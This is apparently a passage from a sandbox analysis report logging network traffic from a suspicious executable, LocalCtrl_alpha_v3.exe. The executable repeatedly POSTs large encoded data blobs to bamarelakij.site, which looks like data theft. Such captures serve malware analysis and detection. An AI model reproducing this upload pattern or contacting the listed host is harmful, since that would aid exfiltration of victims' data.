                                                                                                                                                                2025-01-09 13:42:51 UTC1390INData Raw: 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5
                                                                                                                                                                Data Ascii: DsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                18192.168.2.750084104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:56 UTC438OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 130028
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 69 a5 01 00 58 04 ce 1c 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2e 06 00 00 b0 08 9d 38 00 00 00 00 27 81 21 25 31 81 21 4d 86 d0 e4 de da ca b3 70 86 74 b8 aa e6 ca e4 e6 b8 cc e4 de dc e8 c8 ca e6 d6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 23 33 81 21 4f 88 ca cc c2 ea d8 e8 b3 80 86 74 b8 aa e6 ca e4 e6 b8 cc e4 de dc e8 c8 ca e6 d6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 8e de de ce d8 ca b8 86 d0 e4 de da ca b8 aa e6 ca e4 40 88 c2 e8 c2 b8 88 ca cc c2 ea d8 e8 b3 68 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 b8 86 d0 e4 de da ca b8 e0 e4 de cc d2 d8 ca e6 b8 88 ca cc c2 ea d8 e8 b8 98 de
                                                                                                                                                                Data Ascii: iXG6.8'!%1!Mpt@#3!Ot@h
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 8f 99 67 80 d7 34 7c c2 d2 26 3c 4c 4f 70 82 0a 15 64 74 bb 7f c9 91 55 e3 3d 86 6d 14 83 6c 20 a7 f4 b6 b6 d2 8c 65 d4 4d 03 d4 c8 b0 b4 19 aa e1 e3 f2 56 c5 52 95 ec c9 3d c4 5b 32 6d 59 91 bc 53 38 38 35 6c 1e e4 b0 14 55 b1 da d5 2d 25 e7 9c 0b 9b ac 47 09 20 d8 23 fb 1a 03 03 33 90 2d 88 28 62 bc cc 1a f1 a8 b7 1e 8d 6c d1 f6 ea 92 2b dc 92 ab 50 95 2d 4c c3 c4 f4 d8 b9 10 b5 83 f3 6c cd f3 e4 bf 23 4f 25 ed 22 56 e7 c3 c8 02 45 b3 0f 66 0c 59 d0 ab 95 61 61 de 26 14 1f fc 0c 81 b7 96 f4 3f fc 7b 4c 01 ef 58 6f de 03 96 78 6d 1e 20 5a 11 1f 22 7c 52 97 ae 13 49 a5 37 2a 86 31 c3 27 eb 5d fb 08 80 2e cc 47 4b 0f e9 ae 25 52 1a a9 86 8d 0d 84 f3 77 5c 45 1f 7b bb 88 bb d1 19 fc 32 6d 30 d3 4f 32 af f7 20 4c e2 2b cb 1b 63 92 22 e5 22 50 61 77 7d a1 ef
                                                                                                                                                                Data Ascii: g4|&<LOpdtU=ml eMVR=[2mYS885lU-%G #3-(bl+P-Ll#O%"VEfYaa&?{LXoxm Z"|RI7*1'].GK%Rw\E{2m0O2 L+c""Paw}
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 3c aa d4 6c 38 68 b5 a0 c6 9b a9 43 ac 71 0d f3 09 d7 4a f8 d0 26 c6 7b ed 2d 8e 70 6b 94 d0 65 5b 6f 8a be e2 9a 43 9a bd 35 b6 4c 81 78 2a 90 8a 3d c7 c2 4f 02 d5 e7 c5 69 19 14 cb 0d ef 2c 6d 58 97 3a ec f4 f1 5a 7d 1a ae 9e 74 2d 6a c2 18 77 40 d4 43 35 94 f6 8d 78 ea f9 01 4f 14 58 00 8c 91 e8 76 4d c0 95 02 2a e1 28 38 a8 43 c5 79 e1 db 64 5f 17 bc c0 28 bd 3d b5 8f 3f 86 28 6b 4c a8 e3 f4 8c 66 59 90 c0 08 09 e6 31 c8 41 b4 6f b7 41 b2 e0 b4 6f f2 86 a4 e3 96 16 88 d6 2d e3 76 10 52 71 89 e0 62 73 dc c7 a6 cc 8b ad 5a 1e e8 62 4c 3f 16 3e a6 9d 62 7e 40 34 57 02 26 9d c4 8d 8c 9c db 85 81 8c 63 6a 06 68 32 ca 44 18 c0 c9 cc 63 72 54 50 41 b0 fc c0 67 16 df 60 41 31 a0 09 99 70 64 cf 6f f2 7a 4f 12 10 6c 6c a5 14 3d 6a 24 91 dc 04 a2 e6 2e 7e 53 20
                                                                                                                                                                Data Ascii: <l8hCqJ&{-pke[oC5Lx*=Oi,mX:Z}t-jw@C5xOXvM*(8Cyd_(=?(kLfY1AoAo-vRqbsZbL?>b~@4W&cjh2DcrTPAg`A1pdozOll=j$.~S
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: d2 04 c3 1b ec f2 75 66 7b 6f f9 8f 23 e0 45 40 e8 07 44 d9 92 04 7f c9 b9 19 4c 23 c5 f9 98 85 ed 02 51 ad 04 a1 98 24 7a a5 52 49 ba dc bc 44 48 be 17 28 cf f6 00 3b 71 19 e9 40 ac ad d2 bb 6c 38 0c 9a cb af 15 19 da 49 e1 80 b8 ba 4f b6 19 71 95 be cf 56 3e db 01 e0 b5 b4 2e 11 ab 16 f0 b5 b0 7b ba 01 98 01 c0 16 98 00 0c 6d 81 12 c4 eb 0c 04 64 a2 27 7e 80 4c 90 61 0a fd 7f c7 7b dd 52 04 df c6 0e 96 f5 ac 79 07 f4 40 e5 2b 88 d9 cc 69 b1 23 ce ac 27 2f 97 2e 6b fd 32 b5 f3 a6 ce 84 e9 49 7c 8c 14 05 44 7b a9 7f e2 93 5a a2 e5 0d 02 31 aa 34 3f ad b0 40 d0 ae 4d 8d 60 c7 2a d8 cf 69 77 8c ee f8 a1 c4 03 41 42 98 31 14 b0 05 86 ee 86 2c 7a fc 7d c5 8f 22 24 6b 85 cc ab 06 09 78 0e 81 4d 03 da 25 5d b2 ec 0a 3e 27 24 49 1a d9 a3 b7 93 5c b5 ff 86 47 ff
                                                                                                                                                                Data Ascii: uf{o#E@DL#Q$zRIDH(;q@l8IOqV>.{md'~La{Ry@+i#'/.k2I|D{Z14?@M`*iwAB1,z}"$kxM%]>'$I\G
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: e8 c2 e8 ca 02 00 20 00 99 59 00 00 00 00 00 00 cb e4 00 00 00 00 00 00 6b fb cf 1d d9 71 24 4e 1c 7d 95 41 7c db 84 aa 3b e5 4d 01 b2 59 f8 94 52 52 ca a4 ec df 3e 0a f2 df ba 94 2e fb dd 16 a8 3b e6 75 75 de ef 3b 33 6a cf 86 ee 0c 9a e1 2e 83 c0 60 91 24 93 fe 7f 09 a3 74 2f b6 f5 22 4c a2 a7 8f ea 74 fa 49 96 31 7f 79 7f f9 d7 0a 0d 52 3d 8a 60 21 48 b0 24 85 20 29 4c 92 02 0b d0 10 2c 20 34 06 62 02 82 80 34 c8 f0 19 c0 a2 88 81 b2 3d 03 52 02 4a 40 24 88 c2 bc c0 a2 c3 be 5e 5e 5f 5e 92 74 af 96 7e f8 69 fa 25 7d 79 ff f7 4a dc a5 e0 f5 30 4d 68 37 7e f5 5c 9c 7e 85 c2 d0 95 68 f2 f2 be 4d 6a fa fa 52 cf 1f 7d f6 f2 9f 85 cc fd 92 fa 88 8f 8e 25 cc c3 b5 58 fe a6 f4 9c 87 52 5c 7c f5 5d 72 fd b6 b3 bf be be 25 7d 1a 97 dd 46 19 2f 65 df cd 1f 71 df
                                                                                                                                                                Data Ascii: Ykq$N}A|;MYRR>.;uu;3j.`$t/"LtI1yR=`!H$ )L, 4b4=RJ@$^^_^t~i%}yJ0Mh7~\~hMjR}%XR\|]r%}F/eq
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 80 c3 38 0f 41 41 81 85 30 9f 60 04 83 05 10 12 66 04 98 60 70 54 e1 48 89 40 38 0c c7 08 0e e4 10 0a 12 68 89 64 50 84 e1 68 1d 45 38 9d 24 ff ca 09 ff b4 cc fb fd f5 a5 0f ba ba 1e ca 68 09 fa 3b 4f e2 2c af ea a4 cf c2 3e cc 9a a6 1c c3 bf ec c3 fe 33 22 a2 29 8a 92 0d c5 b2 1d 48 d0 2d c7 70 24 06 0a 15 4d 62 3c c4 52 1c 4a 32 05 8c 50 25 c7 b2 10 c3 20 04 ce 72 38 cd 60 19 47 72 0d 86 e2 29 fd ce 7f 09 47 28 f3 b7 cf c8 9c fc 9a 17 fa 22 af d2 ad e8 8a 35 fe 54 7a 3c 45 d8 11 97 60 93 97 74 dd 17 7f 17 e7 7c 87 09 fe a4 6e 1c 83 10 87 16 08 8e 40 30 05 47 30 90 c5 60 0e 67 50 0f 45 28 1d e0 08 18 a5 68 12 64 71 81 85 38 13 a4 71 01 c2 28 97 a0 58 48 e0 78 06 fd e6 99 08 fd 0c fd 0c fa 72 4d 7d 15 35 58 99 55 6d 58 d7 51 9c 0f 5d d7 37 42 1f 45 44 5b
                                                                                                                                                                Data Ascii: 8AA0`f`pTH@8hdPhE8$h;O,>3")H-p$Mb<RJ2P% r8`Gr)G("5Tz<E`t|n@0G0`gPE(hdq8q(XHxrM}5XUmXQ]7BED[
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 09 4c dd 4e 48 68 0a 47 66 7a bc fa a1 22 fd a2 8e 54 9a 02 7e d1 e7 3d 45 49 48 2f e5 1e 52 49 25 2a 47 35 d5 fc ee 69 7d d5 d0 32 25 c5 7a 6a bd ca 6a 1b fe 9d a7 7c 29 3a 9e 40 aa 6f 46 f5 78 24 c2 5d a2 49 fe 75 c2 b6 28 a0 44 4c 36 b8 3a 93 5c ff 09 25 31 f7 3a d3 3e 1b ee a9 4d d0 69 82 6f 26 17 c0 20 0f ca 39 47 36 56 2b 8c de 32 3b 35 5d 21 13 34 a8 98 1d b7 d3 6a 46 44 da af 68 34 98 fd 60 8e 9a c7 d8 f6 ef d6 f7 77 f6 9d f7 aa 4e 19 3f 97 51 9b 1e 74 63 fe 88 02 de 8b 93 61 12 09 4c 7c d4 85 60 1c c8 96 7d 43 58 8a a2 80 12 4f a0 91 f8 b6 c8 53 8b 4d 98 96 9e 91 4e f3 78 fe 3c a9 43 90 c8 a9 cd a2 59 ca 96 f5 b2 86 1a 9c 8d 36 ec fc 88 fa ff a0 91 11 97 01 44 5a b6 25 0d 8e 65 be bf f2 79 df cb 0f 9b c9 11 70 7a 24 4c 8e 80 63 66 77 dd eb f3 15
                                                                                                                                                                Data Ascii: LNHhGfz"T~=EIH/RI%*G5i}2%zjj|):@oFx$]Iu(DL6:\%1:>Mio& 9G6V+2;5]!4jFDh4`wN?QtcaL|`}CXOSMNx<CY6DZ%eypz$Lcfw
                                                                                                                                                                2025-01-09 13:42:56 UTC15331OUTData Raw: 00 00 00 df 04 00 00 00 00 00 00 11 d0 02 00 00 00 00 00 a0 96 02 04 5a 00 5a 00 00 10 10 00 3e 56 92 b2 4e dd 7d d5 ff ff ff ff ff ff ff ff 44 00 38 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 5e 8a c8 ce ca 5e 98 de c6 c2 d8 40 a6 e8 c2 e8 ca 02 00 30 00 99 59 00 00 00 00 00 00 cb e4 00 00 00 00 00 00 dd d7 00 00 00 00 00 00 a0 96 02 04 5a 00 5a 00 00 10 10 00 3e 56 92 b2 fe 0c 20 30 ff ff ff ff ff ff ff ff 5e 00 38 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 5e 8a c8 ce ca 5e e0 e4 de cc d2 d8 ca e6 5e 88 ca cc c2 ea d8 e8 5e 90 d2 e6 e8 de e4 f2 02 00 30 00 00 c0 04 00 00 00 00 00 b4 16 00 00 00 00 00 00 a2 1b 02 00 00 00 00 00 a0 96 02 04 5a 00 5a
                                                                                                                                                                Data Ascii: ZZ>VN}D8^^@0YZZ>V 0^8^^^^0ZZ
                                                                                                                                                                2025-01-09 13:42:56 UTC7380OUTData Raw: 4b bf 90 7f 35 53 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bd ed 14 f3 20 2b 14 f3 20 2a 16 f3 20 1a 28 e5 42 54 28 e5 42 95 2e e5 42 95 cb e7 43 79 66 09 21 96 7f 38 a5 de 4f be 9d 28 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 3e 08 df 91 2b 86 72 54 8c 07 07 43 28 15 8b 6e 3d d0 7f 72 b4 79 66 54 0f 83 51 b0 3c 38 18 8b bc c9 85 f1 b9 9d 20 84 71 3d 52 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 41 43 20 84 5c fb 8c 90 7f 37 fc 46 26 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e d0 dc 5e 88 8b 51 28 15 8b 6e 3d d0 7f 72 35 b7 b2 11 15 cb c4
                                                                                                                                                                Data Ascii: K5S + * (BT(B.BCyf!8O(>+rTC(n=ryfTQ<8 q=RoAC \7F&~^Q(n=r5
                                                                                                                                                                2025-01-09 13:42:57 UTC814INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:57 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXUGYoBbMW76NsmIEy3VCfze8UWGa1nh%2Fxla%2B3EB7YXqxZLz%2FSFnlIU9BQWzWJTWndffgZu9hyahoCE8vyasUfEgS6I4MQaAknFWQxcqho2742fMplTvXM7lWWVasqNvC7m3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da7a0bb643a9-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1605&rtt_var=606&sent=56&recv=139&lost=0&retrans=0&sent_bytes=2838&recv_bytes=131454&delivery_rate=1799137&cwnd=245&unsent_bytes=0&cid=93d8fe4810b1575e&ts=802&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.750085104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:57 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 745
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:57 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
                                                                                                                                                                2025-01-09 13:42:58 UTC811INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:58 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTUiQulqudRTstNFX1v74KLZTm4S40crXSeqq6KvReCxK%2FSyzwv4z3dOO%2Fuo%2FVyE5ksryVMnPCyjTvSNJiUW4VN%2FOgnSU5TfUN9eBtfQ5XghNwzlqfmVf6PxUDooHezVrRBz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da840cfd42ee-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1622&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1816&delivery_rate=1800246&cwnd=218&unsent_bytes=0&cid=cfbecd58f8f3ada9&ts=318&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.750086104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:58 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 212
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:58 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: p_ G6@'%#@XZZ
                                                                                                                                                                2025-01-09 13:42:59 UTC817INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:59 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDkUrc6c6adV0exT0DRrUi9Te6H9zKQq2xvlJmM6bQGAtNtIeth%2Fuq1u%2Fw7yPSAHfxrn7WE%2FiKnhiJefbCs8jGYPq4SbSlVzTTesM5YiPsM%2Fd%2FtLG9n13h%2BIl71vvtO1%2BjEz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da8a0a9442f7-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1283&delivery_rate=1762220&cwnd=179&unsent_bytes=0&cid=f8b53ac77f3889dd&ts=318&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.750087104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:59 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 380
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:59 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 1e 5a f7 29 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 3c b4 ef 52 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 3c b4 ef 52 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 94 00 00 00 13 6a 2a 23 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 04 00 00 00 26 d4 54 46 00 00 00 00 23 21 00 00 00 00 c4 00 00 00 26 d4 54 46 00 00 00 00 a0 96 0c 0c 58
                                                                                                                                                                Data Ascii: Z)G6<R%!<RXZZj*#G6&TF#!&TFX
                                                                                                                                                                2025-01-09 13:43:00 UTC811INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:59 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hG%2FbSgjPSNituORwPs4AOzhu6C4BIRnRBlb%2FRwa7bsafBO6JPkUaDkPQxD6lnxpG8Jq%2B0HGK6hE0K%2B0CpHDxfD7ni92xUf4Umoc4N25r5PAJM7fYmKGyJi250O0oswfwgVIu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4da8fdf102361-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1810&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1451&delivery_rate=1537651&cwnd=241&unsent_bytes=0&cid=f761c9884fe822f6&ts=324&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.750088104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:00 UTC436OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                Host: bamarelakij.site
